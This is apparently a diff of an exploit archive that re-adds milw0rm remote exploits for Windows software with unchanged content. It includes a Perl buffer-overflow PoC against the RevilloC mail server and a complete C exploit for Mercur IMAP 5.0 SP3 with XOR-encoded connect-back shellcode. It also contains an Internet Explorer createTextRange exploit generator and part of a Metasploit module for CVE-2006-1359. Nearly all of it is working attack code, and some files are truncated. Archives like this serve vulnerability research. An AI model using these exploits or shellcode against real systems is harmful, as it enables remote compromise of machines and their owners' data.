+                      "\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0".
+                      "\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB".
+                      "\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5".
+                      "\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98".
+                      "\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE".
+                      "\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77".
+                      "\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8".
+                      "\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF".
+                      "\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90".
+                      "\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74".
+                      "\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4".
+                      "\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94".
+                      "\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5".
+                      "\xD3\x4A\x8C\x88";
+                $buffer = "\x90"x3601;
+                $eax ="\x83\xb5\x19\x01"; # change if needed             
+                $peb= "\x20\xf0\xfd\x7f"; #PEB lock
+                $user ="USER  ";
+                $enter  = "\x0d\x0a";
+                $connect = IO::Socket::INET ->new (Proto=>"tcp",
+	      PeerAddr=> "$ARGV[0]",
+	      PeerPort=>"110"); unless ($connect) { die "cant connect" }  
+                print "\nRevilloC mail server remote PoC exploit by securma massine\n";
+                print "\nsecurma\@morx.org\n";
+                print "\n+++++++++++www.morx.org++++++++++++++++\n";              
+                $connect->recv($text,128); 
+                print "$text\n";
+                print "[+] Sent USER\n";
+                $connect->send($user . $buffer . $shellcode . $eax . $peb . $enter); 
+	      print "[+] Sent shellcode..telnet to victim host port 9191\n";
+
+# milw0rm.com [2006-03-07]
diff --git a/platforms/windows/remote/159.c b/platforms/windows/remote/159.c
index 06d5db413..f0fbdc975 100755
--- a/platforms/windows/remote/159.c
+++ b/platforms/windows/remote/159.c
@@ -553,6 +553,6 @@ closesocket(s);
 
 return 0;
 }
-
-
-// milw0rm.com [2004-02-29]
+
+
+// milw0rm.com [2004-02-29]
diff --git a/platforms/windows/remote/1592.c b/platforms/windows/remote/1592.c
index 90e1e6f77..e3c5ab9de 100755
--- a/platforms/windows/remote/1592.c
+++ b/platforms/windows/remote/1592.c
@@ -1,306 +1,306 @@
-/*
- * mercur.cpp
- *
- * Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit
- * Copyright (C) 2006 Javaphile Group
- * http://www.javaphile.org
- *
- * Exploits code by : pll Ellison.Tang[at]gmail[dot]com
- *
- * Bug Reference:
- * http://www.frsirt.com/bulletins/4332
- *
- */
-
-#include 
-#include 
-#include 
-#include 
-
-#pragma comment(lib, "ws2_32")
-
-SOCKET ConnectTo(char *ip, int port)
-{
-	WSADATA	wsaData;
-	SOCKET	s;
-	struct	hostent		*he;
-	struct	sockaddr_in	host;
-	int		nTimeout=150000;
-
-	if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0)
-	{
-		printf("[-]WSAStartup failed.\n");
-		exit(-1);
-	}
-
-	if((he=gethostbyname(ip))==0)
-	{
-		printf("[-]Failed to resolve '%s'.", ip);
-		exit(-1);
-	}
-
-	host.sin_port=htons(port);
-	host.sin_family=AF_INET;
-	host.sin_addr=*((struct in_addr *)he->h_addr);
-
-	if ((s=socket(AF_INET,SOCK_STREAM,0))<0)
-	{
-		printf("[-]Failed creating socket.");
- 		exit(-1);
- 	}
-
-	if ((connect(s,(struct sockaddr *)&host,sizeof(host)))==-1)
-	{
-		closesocket(s);
-		printf("[-]Failed connecting to host.\n");
-		exit(-1);
-	}
-	setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeout,sizeof(nTimeout));
-	return s;
-}
-
-
-void Disconnect(SOCKET s)
-{
-	closesocket(s);
-	WSACleanup();
-}
-
-void PrintSc(unsigned char *sc, int len)
-{
-    int    i,j;
-    char *p;
-    char msg[6];
-
-    //printf("/* %d bytes */\n", buffsize);
-
-    // Print general shellcode
-    for(i = 0; i < len; i++)
-    {
-        if((i%16)==0)
-        {
-            if(i!=0)
-                printf("\"\n\"");
-            else
-                printf("\"");
-        }
-
-        //printf("\\x%.2X", sc[i]);
-
-        sprintf(msg, "\\x%.2X", sc[i] & 0xff);
-
-        for( p = msg, j=0; j < 4; p++, j++ )
-        {
-            if(isupper(*p))
-                printf("%c", _tolower(*p));
-            else
-                printf("%c", p[0]);
-        }
-    }
-
-    printf("\";\n");
-}
-
-void main(int argc,char* argv[])
-{
-
-	struct OSTYPE
-	{
-		unsigned int ret;
-		char des[255];
-	};
-
-	OSTYPE os[] = {
-		{0x7FFA4512, "CN Windows ALL 0x7FFA4512"},
-		{0x7801f4fb, "Windows 2k SP4 0x7801f4fb"},
-		{0xDDDDDDDD, "Debug"},
-		{0, NULL}
-	};
-
-	unsigned char shellcode[]=
-	/* ip offset: 71 + 21 = 92 */
-	/* port offset: 78 + 21 = 99 */
-	/* 21 bytes decode */
-	"\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
-	"\xe8\xed\xff\xff\xff"
-	/* 254 bytes shellcode, xor with 0xee */
-	"\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
-	"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee"
-	"\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b"
-	"\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef"
-	"\x84\xec\x11\xb8\xfe\x7d\x86"
-	"\x91\xee\xee\xef"				//ip
-	"\x86"
-	"\xec\xee"
-	"\xee\xdb"						//port
-	"\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84"
-	"\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45"
-	"\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf"
-	"\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11"
-	"\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0"
-	"\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b"
-	"\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05"
-	"\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65"
-	"\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11"
-	"\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37"
-	"\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97";
-
-	unsigned char FindSc[]=
-	"\x8B\xCC\x80\xE9\x3E\x8B\xF1\x33\xC0\x40\xC1\xE0\x0A\x04\x80\x8B"
-	"\xF8\x57\x33\xC9\xB1\x3E\xF3\xA4\x5F\xFF\xE7\x8B\xC7\x04\x28\x50"
-	"\x33\xC0\x50\x64\x89\x20\xBA\x41\x47\x4F\x55\x33\xFF\x3B\x17\x74"
-	"\x03\x47\xEB\xF9\x83\xC7\x04\x3B\x17\x74\x03\x47\xEB\xEF\x83\xC7"
-	"\x04\x57\xC3\x8B\x54\x24\x0C\x33\xC0\xB4\x10\x33\xDB\xB3\x9C\x01"
-	"\x04\x13\x33\xC0\xC3"
-	"\x90\x90\x90\x90"
-	"\xEB\xA5";
-
-
-	if(argc < 5)
-	{
-		printf("Mercur IMAPD 5.0 SP3 Remote Exploit\n");
-		printf("-------------------------------------------\n");
-		printf("Usage:\n");
-		printf("   %s    \n", argv[0]);
-		printf("\nType could be:\n");
-
-		int i=0;
-		while(os[i].ret)
-		{
-			printf(" [%d]  %s\n", i, os[i].des);
-			i++;
-		}
-		return;
-	}
-
-	SOCKET	s=ConnectTo(argv[1],143);
-
-	printf("[+]Connected to target...");
-
-	char szRecvBuff[600] = {0};
-
-	if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
-	{
-		printf("failed!\n");
-		return;
-	}
-	else
-	{
-		printf("done!\n");
-	}
-
-//	printf("%s\n",szRecvBuff);
-
-	if(strstr(szRecvBuff, "MERCUR") == NULL)
-	{
-		printf("[-]Seems not IMAP running.\n");
-		printf("Quiting...");
-		return;
-	}
-	else
-	{
-		printf("[*]Seems IMAP running.\n");
-	}
-
-	unsigned long dwCbIp=inet_addr(argv[2]);
-
-	unsigned short q=(unsigned short)atoi(argv[3]);
-	unsigned short dwCbPort=(unsigned short)q;
-
-	dwCbIp=dwCbIp^0xEEEEEEEE;
-	dwCbPort=dwCbPort^0xEEEE;
-
-	shellcode[92] =(char) (dwCbIp & 0x000000FF);
-	shellcode[93] =(char) ((dwCbIp & 0x0000FF00)>>8);
-	shellcode[94] =(char) ((dwCbIp & 0x00FF0000)>>16);
-	shellcode[95] =(char) ((dwCbIp & 0xFF000000)>>24);
-
-	shellcode[99] =(char) ((dwCbPort & 0x0000FF00)>>8);
-	shellcode[100] =(char) (dwCbPort & 0x000000FF);
-
-	char	szUserName[20]={0};
-	printf("[?]Username:");
-	gets(szUserName);
-
-	char	szPassWord[20]={0};
-	printf("[?]Passwd:");
-	gets(szPassWord);
-
-	char	szLogin[]=" login ";
-	char	szLoginInfo[50]={0};
-	unsigned char	szSpace=0x20;
-	char szEnd[]="\r\n";
-
-	memcpy(szLoginInfo,szUserName,lstrlen(szUserName));
-	int		dwLen=lstrlen(szUserName);
-	memcpy(szLoginInfo+dwLen,szLogin,lstrlen(szLogin));
-	dwLen+=lstrlen(szLogin);
-	memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
-	dwLen+=lstrlen(szPassWord);
-	memcpy(szLoginInfo+dwLen,&szSpace,1);
-	dwLen++;
-	memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
-	dwLen+=lstrlen(szPassWord);
-	memcpy(szLoginInfo+dwLen,szEnd,lstrlen(szEnd));
-
-//	printf("%s\n",szLoginInfo);
-
-	printf("[+]Sending Login Info...");
-
-	send(s,szLoginInfo,lstrlen(szLoginInfo),0);
-
-	if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
-	{
-		printf("failed!\n");
-		return;
-	}
-	else
-	{
-		printf("done!\n");
-	}
-
-//	printf("%s\n",szRecvBuff);
-
-	if(strstr(szRecvBuff, "OK") == NULL)
-	{
-		printf("[-]Seems not a valid user or not support IMAP.\n");
-		printf("Quiting...");
-		return;
-	}
-	else
-	{
-		printf("[*]Seems a valid user.\n");
-	}
-
-	char	szSelect[]=" select ";
-	char	szMagicData[1000]={0};
-
-	memset(szMagicData,'A',sizeof(szMagicData)-1);
-	memcpy(szMagicData,szUserName,lstrlen(szUserName));
-	memcpy(szMagicData+lstrlen(szUserName),szSelect,sizeof szSelect-1);
-
-	int p=atoi(argv[4]);
-	*(unsigned int *)&FindSc[85] = os[p].ret;
-
-	memcpy(szMagicData+251-sizeof FindSc+1,FindSc,sizeof FindSc-1);
-
-	memcpy(szMagicData+251,szEnd,sizeof szEnd-1);
-
-	char	szAdog[]="AGOU";
-	memcpy(szMagicData+253,szAdog,sizeof szAdog-1);
-	memcpy(szMagicData+257,szAdog,sizeof szAdog-1);
-	memcpy(szMagicData+261,shellcode,sizeof shellcode-1);
-
-	memcpy(szMagicData+sizeof szMagicData-sizeof szEnd,szEnd,sizeof szEnd-1);
-
-	printf("[+]Sending Magic Data To server...Good Luck!\n");
-	send(s,szMagicData,sizeof szMagicData-1,0);
-
-	recv(s,szRecvBuff,sizeof(szRecvBuff),0);
-	printf("%s\n",szRecvBuff);
-
-	Disconnect(s);
-	printf("[?]Sending finished...Good luck!\n");
-}
-
-// milw0rm.com [2006-03-19]
+/*
+ * mercur.cpp
+ *
+ * Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit
+ * Copyright (C) 2006 Javaphile Group
+ * http://www.javaphile.org
+ *
+ * Exploits code by : pll Ellison.Tang[at]gmail[dot]com
+ *
+ * Bug Reference:
+ * http://www.frsirt.com/bulletins/4332
+ *
+ */
+
+#include 
+#include 
+#include 
+#include 
+
+#pragma comment(lib, "ws2_32")
+
+SOCKET ConnectTo(char *ip, int port)
+{
+	WSADATA	wsaData;
+	SOCKET	s;
+	struct	hostent		*he;
+	struct	sockaddr_in	host;
+	int		nTimeout=150000;
+
+	if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0)
+	{
+		printf("[-]WSAStartup failed.\n");
+		exit(-1);
+	}
+
+	if((he=gethostbyname(ip))==0)
+	{
+		printf("[-]Failed to resolve '%s'.", ip);
+		exit(-1);
+	}
+
+	host.sin_port=htons(port);
+	host.sin_family=AF_INET;
+	host.sin_addr=*((struct in_addr *)he->h_addr);
+
+	if ((s=socket(AF_INET,SOCK_STREAM,0))<0)
+	{
+		printf("[-]Failed creating socket.");
+ 		exit(-1);
+ 	}
+
+	if ((connect(s,(struct sockaddr *)&host,sizeof(host)))==-1)
+	{
+		closesocket(s);
+		printf("[-]Failed connecting to host.\n");
+		exit(-1);
+	}
+	setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeout,sizeof(nTimeout));
+	return s;
+}
+
+
+void Disconnect(SOCKET s)
+{
+	closesocket(s);
+	WSACleanup();
+}
+
+void PrintSc(unsigned char *sc, int len)
+{
+    int    i,j;
+    char *p;
+    char msg[6];
+
+    //printf("/* %d bytes */\n", buffsize);
+
+    // Print general shellcode
+    for(i = 0; i < len; i++)
+    {
+        if((i%16)==0)
+        {
+            if(i!=0)
+                printf("\"\n\"");
+            else
+                printf("\"");
+        }
+
+        //printf("\\x%.2X", sc[i]);
+
+        sprintf(msg, "\\x%.2X", sc[i] & 0xff);
+
+        for( p = msg, j=0; j < 4; p++, j++ )
+        {
+            if(isupper(*p))
+                printf("%c", _tolower(*p));
+            else
+                printf("%c", p[0]);
+        }
+    }
+
+    printf("\";\n");
+}
+
+void main(int argc,char* argv[])
+{
+
+	struct OSTYPE
+	{
+		unsigned int ret;
+		char des[255];
+	};
+
+	OSTYPE os[] = {
+		{0x7FFA4512, "CN Windows ALL 0x7FFA4512"},
+		{0x7801f4fb, "Windows 2k SP4 0x7801f4fb"},
+		{0xDDDDDDDD, "Debug"},
+		{0, NULL}
+	};
+
+	unsigned char shellcode[]=
+	/* ip offset: 71 + 21 = 92 */
+	/* port offset: 78 + 21 = 99 */
+	/* 21 bytes decode */
+	"\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
+	"\xe8\xed\xff\xff\xff"
+	/* 254 bytes shellcode, xor with 0xee */
+	"\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
+	"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee"
+	"\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b"
+	"\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef"
+	"\x84\xec\x11\xb8\xfe\x7d\x86"
+	"\x91\xee\xee\xef"				//ip
+	"\x86"
+	"\xec\xee"
+	"\xee\xdb"						//port
+	"\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84"
+	"\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45"
+	"\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf"
+	"\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11"
+	"\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0"
+	"\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b"
+	"\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05"
+	"\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65"
+	"\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11"
+	"\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37"
+	"\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97";
+
+	unsigned char FindSc[]=
+	"\x8B\xCC\x80\xE9\x3E\x8B\xF1\x33\xC0\x40\xC1\xE0\x0A\x04\x80\x8B"
+	"\xF8\x57\x33\xC9\xB1\x3E\xF3\xA4\x5F\xFF\xE7\x8B\xC7\x04\x28\x50"
+	"\x33\xC0\x50\x64\x89\x20\xBA\x41\x47\x4F\x55\x33\xFF\x3B\x17\x74"
+	"\x03\x47\xEB\xF9\x83\xC7\x04\x3B\x17\x74\x03\x47\xEB\xEF\x83\xC7"
+	"\x04\x57\xC3\x8B\x54\x24\x0C\x33\xC0\xB4\x10\x33\xDB\xB3\x9C\x01"
+	"\x04\x13\x33\xC0\xC3"
+	"\x90\x90\x90\x90"
+	"\xEB\xA5";
+
+
+	if(argc < 5)
+	{
+		printf("Mercur IMAPD 5.0 SP3 Remote Exploit\n");
+		printf("-------------------------------------------\n");
+		printf("Usage:\n");
+		printf("   %s    \n", argv[0]);
+		printf("\nType could be:\n");
+
+		int i=0;
+		while(os[i].ret)
+		{
+			printf(" [%d]  %s\n", i, os[i].des);
+			i++;
+		}
+		return;
+	}
+
+	SOCKET	s=ConnectTo(argv[1],143);
+
+	printf("[+]Connected to target...");
+
+	char szRecvBuff[600] = {0};
+
+	if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
+	{
+		printf("failed!\n");
+		return;
+	}
+	else
+	{
+		printf("done!\n");
+	}
+
+//	printf("%s\n",szRecvBuff);
+
+	if(strstr(szRecvBuff, "MERCUR") == NULL)
+	{
+		printf("[-]Seems not IMAP running.\n");
+		printf("Quiting...");
+		return;
+	}
+	else
+	{
+		printf("[*]Seems IMAP running.\n");
+	}
+
+	unsigned long dwCbIp=inet_addr(argv[2]);
+
+	unsigned short q=(unsigned short)atoi(argv[3]);
+	unsigned short dwCbPort=(unsigned short)q;
+
+	dwCbIp=dwCbIp^0xEEEEEEEE;
+	dwCbPort=dwCbPort^0xEEEE;
+
+	shellcode[92] =(char) (dwCbIp & 0x000000FF);
+	shellcode[93] =(char) ((dwCbIp & 0x0000FF00)>>8);
+	shellcode[94] =(char) ((dwCbIp & 0x00FF0000)>>16);
+	shellcode[95] =(char) ((dwCbIp & 0xFF000000)>>24);
+
+	shellcode[99] =(char) ((dwCbPort & 0x0000FF00)>>8);
+	shellcode[100] =(char) (dwCbPort & 0x000000FF);
+
+	char	szUserName[20]={0};
+	printf("[?]Username:");
+	gets(szUserName);
+
+	char	szPassWord[20]={0};
+	printf("[?]Passwd:");
+	gets(szPassWord);
+
+	char	szLogin[]=" login ";
+	char	szLoginInfo[50]={0};
+	unsigned char	szSpace=0x20;
+	char szEnd[]="\r\n";
+
+	memcpy(szLoginInfo,szUserName,lstrlen(szUserName));
+	int		dwLen=lstrlen(szUserName);
+	memcpy(szLoginInfo+dwLen,szLogin,lstrlen(szLogin));
+	dwLen+=lstrlen(szLogin);
+	memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
+	dwLen+=lstrlen(szPassWord);
+	memcpy(szLoginInfo+dwLen,&szSpace,1);
+	dwLen++;
+	memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
+	dwLen+=lstrlen(szPassWord);
+	memcpy(szLoginInfo+dwLen,szEnd,lstrlen(szEnd));
+
+//	printf("%s\n",szLoginInfo);
+
+	printf("[+]Sending Login Info...");
+
+	send(s,szLoginInfo,lstrlen(szLoginInfo),0);
+
+	if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
+	{
+		printf("failed!\n");
+		return;
+	}
+	else
+	{
+		printf("done!\n");
+	}
+
+//	printf("%s\n",szRecvBuff);
+
+	if(strstr(szRecvBuff, "OK") == NULL)
+	{
+		printf("[-]Seems not a valid user or not support IMAP.\n");
+		printf("Quiting...");
+		return;
+	}
+	else
+	{
+		printf("[*]Seems a valid user.\n");
+	}
+
+	char	szSelect[]=" select ";
+	char	szMagicData[1000]={0};
+
+	memset(szMagicData,'A',sizeof(szMagicData)-1);
+	memcpy(szMagicData,szUserName,lstrlen(szUserName));
+	memcpy(szMagicData+lstrlen(szUserName),szSelect,sizeof szSelect-1);
+
+	int p=atoi(argv[4]);
+	*(unsigned int *)&FindSc[85] = os[p].ret;
+
+	memcpy(szMagicData+251-sizeof FindSc+1,FindSc,sizeof FindSc-1);
+
+	memcpy(szMagicData+251,szEnd,sizeof szEnd-1);
+
+	char	szAdog[]="AGOU";
+	memcpy(szMagicData+253,szAdog,sizeof szAdog-1);
+	memcpy(szMagicData+257,szAdog,sizeof szAdog-1);
+	memcpy(szMagicData+261,shellcode,sizeof shellcode-1);
+
+	memcpy(szMagicData+sizeof szMagicData-sizeof szEnd,szEnd,sizeof szEnd-1);
+
+	printf("[+]Sending Magic Data To server...Good Luck!\n");
+	send(s,szMagicData,sizeof szMagicData-1,0);
+
+	recv(s,szRecvBuff,sizeof(szRecvBuff),0);
+	printf("%s\n",szRecvBuff);
+
+	Disconnect(s);
+	printf("[?]Sending finished...Good luck!\n");
+}
+
+// milw0rm.com [2006-03-19]
diff --git a/platforms/windows/remote/1606.html b/platforms/windows/remote/1606.html
index e5afa90b5..47f05c2cc 100755
--- a/platforms/windows/remote/1606.html
+++ b/platforms/windows/remote/1606.html
@@ -1,86 +1,86 @@
-
-
-
-
-
-# milw0rm.com [2006-03-23]
+
+
+
+
+
+# milw0rm.com [2006-03-23]
diff --git a/platforms/windows/remote/1607.cpp b/platforms/windows/remote/1607.cpp
index ba328191d..eb1d2714b 100755
--- a/platforms/windows/remote/1607.cpp
+++ b/platforms/windows/remote/1607.cpp
@@ -1,103 +1,103 @@
-/*
-*
-* Internet Explorer "createTextRang" Download Shellcoded Exploit
-* Bug discovered by Computer Terrorism (UK)
-* http://www.computerterrorism.com/research/ct22-03-2006
-* Reliable exploitation by Darkeagle of Unl0ck Research Team
-* http://www.milw0rm.com/exploits/1606
-*
-* Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2
-* Severity: Critical
-* Impact: Remote System Access
-* Solution Status: Unpatched
-*
-* E-Mail: atmaca@icqmail.com
-* Web: http://www.spyinstructors.com,http://www.atmacasoft.com
-* Credit to Kozan,Darkeagle,delikon,Stelian Ene
-*
-*/
-
-#include 
-#include 
-
-#define BUF_LEN         0x1518
-#define FILE_NAME       "index.htm"
-
-char body1[] =
-	"\r\n"
-	"\r\n";
-
-
-int main(int argc,char *argv[])
-{
-        if (argc < 2)
-        {
-                printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit");
-                printf("\nUsage:\n");
-                printf(" ie_exp \n");
-
-                return 0;
-        }
-
-        FILE *File;
-        char *pszBuffer;
-        char *web = argv[1];
-        char *pu = "%u";
-        char u_t[5];
-        char *utf16 = (char*)malloc(strlen(web)*5);
-
-        if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) {
-                printf("\n [Err:] fopen()");
-                exit(1);
-        }
-
-        pszBuffer = (char*)malloc(BUF_LEN);
-        memcpy(pszBuffer,body1,sizeof(body1)-1);
-
-        memset(utf16,'\0',strlen(web)*5);
-        for (unsigned int i=0;i
+#include 
+
+#define BUF_LEN         0x1518
+#define FILE_NAME       "index.htm"
+
+char body1[] =
+	"\r\n"
+	"\r\n";
+
+
+int main(int argc,char *argv[])
+{
+        if (argc < 2)
+        {
+                printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit");
+                printf("\nUsage:\n");
+                printf(" ie_exp \n");
+
+                return 0;
+        }
+
+        FILE *File;
+        char *pszBuffer;
+        char *web = argv[1];
+        char *pu = "%u";
+        char u_t[5];
+        char *utf16 = (char*)malloc(strlen(web)*5);
+
+        if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) {
+                printf("\n [Err:] fopen()");
+                exit(1);
+        }
+
+        pszBuffer = (char*)malloc(BUF_LEN);
+        memcpy(pszBuffer,body1,sizeof(body1)-1);
+
+        memset(utf16,'\0',strlen(web)*5);
+        for (unsigned int i=0;i [1, 'Enable gzip content encoding'],
-	'Chunked'    => [1, 'Enable chunked transfer encoding'],
-  };
-
-my $info =
-  {
-	'Name'           => 'Internet Explorer createTextRange() Code Execution',
-	'Version'        => '$Revision: 1.4 $',
-	'Authors'        =>
-	  [
-		'Faithless ',
-		'Darkeagle ',
-		'H D Moore ',
-		'',
-		'Anonymous',
-	  ],
-
-	'Description'    =>
-	  Pex::Text::Freeform(qq{
-		This module exploits a code execution vulnerability in Microsoft Internet Explorer.
-	Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory  in a way, which, under 
-	certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point
-	to a very remote, non-existent memory location. This module is the result of merging three
-	different exploit submissions and has only been reliably tested against Windows XP SP2.
-	This vulnerability was independently discovered by multiple parties. The heap spray method
-	used by this exploit was pioneered by Skylined.
-}),
-
-	'Arch'           => [ 'x86' ],
-	'OS'             => [ 'win32', 'winxp', 'win2003' ],
-	'Priv'           => 0,
-
-	'UserOpts'       =>
-	  {
-		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
-		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
-	  },
-
-	'Payload'        =>
-	  {
-		'Space'    => 1024,
-		'BadChars' => "\x00",
-		'Keys'     => ['-bind'],
-	  },
-	'Refs'           =>
-	  [
-		['OSVDB', '24050'],
-		['BID', '17196'],
-		['CVE', '2006-1359'],
-		['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'],
-		['URL', 'http://seclists.org/lists/bugtraq/2006/Mar/0410.html'],
-		['URL', 'http://www.kb.cert.org/vuls/id/876678'],
-		['URL', 'http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html'],
-		['URL', 'http://www.shog9.com/crashIE.html'],
-	  ],
-
-	'DefaultTarget'  => 0,
-	'Targets'        =>
-	  [
-		[ 'Internet Explorer 7 - (7.0.5229.0) -> 3C0474C2 (Windows XP SP2)' ],
-		[ 'Internet Explorer 6 - (6.0.3790.0) -> 746F9468 (Windows XP SP2)' ],
-	  ],
-
-	'Keys'           => [ 'ie' ],
-
-	'DisclosureDate' => 'Mar 19 2006',
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-sub Exploit
-{
-	my $self = shift;
-	
-	if (! $self->InitNops(128)) {
-		$self->PrintLine("[*] Failed to initialize the NOP module.");
-		return;
-	}
-
-	my $server = IO::Socket::INET->new(
-		LocalHost => $self->GetVar('HTTPHOST'),
-		LocalPort => $self->GetVar('HTTPPORT'),
-		ReuseAddr => 1,
-		Listen    => 1,
-		Proto     => 'tcp'
-	  );
-	my $client;
-
-	# Did the listener create fail?
-	if (not defined($server)) {
-		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
-		return;
-	}
-
-	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
-	  Pex::Utils::SourceIP('1.2.3.4') :
-	  $self->GetVar('HTTPHOST');
-
-	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
-
-	while (defined($client = $server->accept())) {
-		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
-	}
-
-	return;
-}
-
-sub HandleHttpClient
-{
-	my $self = shift;
-	my $fd   = shift;
-
-	# Set the remote host information
-	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
-
-	# Read the HTTP command
-	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
-	my $agent;
-
-	# Read in the HTTP headers
-	while ((my $line = $fd->RecvLine(10))) {
-
-		$line =~ s/^\s+|\s+$//g;
-
-		my ($var, $val) = split(/\:/, $line, 2);
-
-		# Break out if we reach the end of the headers
-		last if (not defined($var) or not defined($val));
-
-		$agent = $val if $var =~ /User-Agent/i;
-	}
-
-	my $os = 'Unknown';
-
